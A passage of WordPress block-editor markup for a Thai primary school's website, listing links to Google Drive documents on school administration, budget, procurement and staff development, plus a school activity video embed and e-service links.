data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 